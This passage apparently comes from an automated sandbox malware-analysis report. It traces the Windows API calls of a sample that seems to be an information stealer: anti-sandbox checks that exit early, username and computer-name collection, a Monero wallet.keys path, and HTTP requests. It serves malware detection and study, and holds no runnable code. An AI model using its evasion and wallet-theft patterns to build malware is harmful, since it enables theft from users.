                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01415D48), ref: 008B9933
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01415B88), ref: 008B994C
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420420), ref: 008B9964
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014204E0), ref: 008B997C
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,014203F0), ref: 008B9995
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420540), ref: 008B99AD
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01415AC8), ref: 008B99C5
                                • Part of subcall function 008B9860: GetProcAddress.KERNEL32(75900000,01420468), ref: 008B99DE
                                • Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788
                                • Part of subcall function 008A11D0: ExitProcess.KERNEL32 ref: 008A1211
                                • Part of subcall function 008A1160: GetSystemInfo.KERNEL32(?), ref: 008A116A
                                • Part of subcall function 008A1160: ExitProcess.KERNEL32 ref: 008A117E
                                • Part of subcall function 008A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008A112B
                                • Part of subcall function 008A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 008A1132
                                • Part of subcall function 008A1110: ExitProcess.KERNEL32 ref: 008A1143
                                • Part of subcall function 008A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008A123E
                                • Part of subcall function 008A1220: __aulldiv.LIBCMT ref: 008A1258
                                • Part of subcall function 008A1220: __aulldiv.LIBCMT ref: 008A1266
                                • Part of subcall function 008A1220: ExitProcess.KERNEL32 ref: 008A1294
                                • Part of subcall function 008B6770: GetUserDefaultLangID.KERNEL32 ref: 008B6774
                                • Part of subcall function 008A1190: ExitProcess.KERNEL32 ref: 008A11C6
                                • Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
                                • Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
                                • Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F
                                • Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
                                • Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
                                • Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F
                                • Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01428900,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
                                • Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
                                • Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12
                                • Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 008B6AF9
                              • Sleep.KERNEL32(00001770), ref: 008B6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6B1A
                              • ExitProcess.KERNEL32 ref: 008B6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: db0dd19f2d8482b089ff5cbc31fc7a8ad4bff8215257addc34d704f766ec4db2
                              • Instruction ID: b4526e98b8b4831e9f0274add825dcd3d0dfaa0568ff5491e7c62d80ee6620ce
                              • Opcode Fuzzy Hash: db0dd19f2d8482b089ff5cbc31fc7a8ad4bff8215257addc34d704f766ec4db2
                              • Instruction Fuzzy Hash: 3D310E71900208AAEB08FBE8DC96BEE7778FF54340F504528F112E6691EF746905C7A7
                              Function 008A1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 8a1220-8a1247 call 8b89b0 GlobalMemoryStatusEx 1439 8a1249-8a1271 call 8bda00 * 2 1436->1439 1440 8a1273-8a127a 1436->1440 1442 8a1281-8a1285 1439->1442 1440->1442 1444 8a129a-8a129d 1442->1444 1445 8a1287 1442->1445 1447 8a1289-8a1290 1445->1447 1448 8a1292-8a1294 ExitProcess 1445->1448 1447->1444 1447->1448
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008A123E
                              • __aulldiv.LIBCMT ref: 008A1258
                              • __aulldiv.LIBCMT ref: 008A1266
                              • ExitProcess.KERNEL32 ref: 008A1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: edb37137f32978ee57a64be7ff40570977f65984692822da9bb1abe6f56e441e
                              • Instruction ID: a4f39301facf445028dd3b0fd6ae854c460827c7d7840cf4724749e5d9fd94c3
                              • Opcode Fuzzy Hash: edb37137f32978ee57a64be7ff40570977f65984692822da9bb1abe6f56e441e
                              • Instruction Fuzzy Hash: 1C01FBB0944308BAEF10DBE4CC89B9EBB78FB15705F248058E605FA680D774A545879A
                              Function 008B6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 8b6af3 1451 8b6b0a 1450->1451 1453 8b6aba-8b6ad7 call 8baad0 OpenEventA 1451->1453 1454 8b6b0c-8b6b22 call 8b6920 call 8b5b10 CloseHandle ExitProcess 1451->1454 1459 8b6ad9-8b6af1 call 8baad0 CreateEventA 1453->1459 1460 8b6af5-8b6b04 CloseHandle Sleep 1453->1460 1459->1454 1460->1451
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008B6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 008B6AF9
                              • Sleep.KERNEL32(00001770), ref: 008B6B04
                              • CloseHandle.KERNEL32(?,00000000,?,01428740,?,008C110C,?,00000000,?,008C1110,?,00000000,008C0AEF), ref: 008B6B1A
                              • ExitProcess.KERNEL32 ref: 008B6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: d49d8a20756c514d79b4a54ef3055d4179470620cec25850f2b552b3326dffdf
                              • Instruction ID: 7e7e3a43380321761e17083ad7f06cd6ecc74d556b9a1b41278b43422669815b
                              • Opcode Fuzzy Hash: d49d8a20756c514d79b4a54ef3055d4179470620cec25850f2b552b3326dffdf
                              • Instruction Fuzzy Hash: B8F03470A40229ABEB10EBE09C4ABFE7A34FB14701F104915B502F92D1EBB46541DBA7
                              Function 008A47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008A4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 008A4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 5dfebba0dd7167c2ed9ac6531ddf01ba3312a4405de3f59ec54794bdaaded0d1
                              • Instruction ID: 64c34cac884370ee31bcd4967871e1e94fc607fbd7704908cdb0fe92a34b63c6
                              • Opcode Fuzzy Hash: 5dfebba0dd7167c2ed9ac6531ddf01ba3312a4405de3f59ec54794bdaaded0d1
                              • Instruction Fuzzy Hash: AA216FB1D00209ABDF14DFA5EC49ADE7B74FB44320F008625F915A72D1EB706A0ACF91
                              Function 008B51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 008BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008BA7E6
                                • Part of subcall function 008A6280: InternetOpenA.WININET(008C0DFE,00000001,00000000,00000000,00000000), ref: 008A62E1
                                • Part of subcall function 008A6280: StrCmpCA.SHLWAPI(?,0142F028), ref: 008A6303
                                • Part of subcall function 008A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008A6335
                                • Part of subcall function 008A6280: HttpOpenRequestA.WININET(00000000,GET,?,0142EB78,00000000,00000000,00400100,00000000), ref: 008A6385
                                • Part of subcall function 008A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008A63BF
                                • Part of subcall function 008A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008A63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008B5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 00ae95a0a92154c2d3f0f94557c7822b81af4820ce3483ca4b0e2455a0758289
                              • Instruction ID: c02457e96f7f7d546f0d2e66b5a309ad238f4e030b4fc61a05562eca5232f896
                              • Opcode Fuzzy Hash: 00ae95a0a92154c2d3f0f94557c7822b81af4820ce3483ca4b0e2455a0758289
                              • Instruction Fuzzy Hash: B911EF30910548B6DB18FF68DD96AED7778FF50300F404168F91ADA692EF34AB05C693
                              Function 008A1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008A112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 008A1132
                              • ExitProcess.KERNEL32 ref: 008A1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: fadc52dfd8a2892281694684a9d38ae779e0d918087dc0a962c73b02442e99f1
                              • Instruction ID: a6b8f180a06f4b8cfe82bb5767efe781728606f19fa55d19619b35d37240cbe5
                              • Opcode Fuzzy Hash: fadc52dfd8a2892281694684a9d38ae779e0d918087dc0a962c73b02442e99f1
                              • Instruction Fuzzy Hash: 83E08670945348FFEB10EBE09C4EB087AB8EB04B01F104044F708BA5C0D6B43601979A
                              Function 008A10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008A10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008A10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 07691884c1e7cdded092ab148d12a0d844a1c309b0a090245bad014cfb379c20
                              • Instruction ID: 34f5bae465d8c4251847826dd5a883328f74f600a485731d1c9d8bb3d7bfe7d5
                              • Opcode Fuzzy Hash: 07691884c1e7cdded092ab148d12a0d844a1c309b0a090245bad014cfb379c20
                              • Instruction Fuzzy Hash: 03F0E271641208BBEB14DAA8AC89FAAB7ECE705B15F300448F604E7280D571AE00CBA1
                              Function 00C9066A Relevance: 1.5, APIs: 1, Instructions: 26libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: b49cb51966b13bbac2d9c95c4c78df551ec01bcf261cf2338eb2107149db3720
                              • Instruction ID: 8d7db8cac446c779ab730e7294cbb49504a663b30d901e934bbab89bdbeaccb6
                              • Opcode Fuzzy Hash: b49cb51966b13bbac2d9c95c4c78df551ec01bcf261cf2338eb2107149db3720
                              • Instruction Fuzzy Hash: 4EF0F47105E304EFCB21AF26CA4932EF3F4AF94711F24880EE6C547614DA368A54EB5B
                              Function 008A1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
                                • Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
                                • Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F
                                • Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
                                • Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
                                • Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F
                              • ExitProcess.KERNEL32 ref: 008A11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                              • Associated: 00000000.00000002.2084561032.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2084582320.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2085054907.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086118949.0000000000DAB000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086265926.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2086287887.0000000000F4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_8a0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 9eecff8197b86b84384c96d419baf4b0eeb35d9d7f8ef1971ac208b8b73e920d
                              • Instruction ID: 24defdd9049a7b4623bb2ac3d716d3ec174f895e1ab7cc0b1aa8b7f3413ee0fe
                              • Opcode Fuzzy Hash: 9eecff8197b86b84384c96d419baf4b0eeb35d9d7f8ef1971ac208b8b73e920d
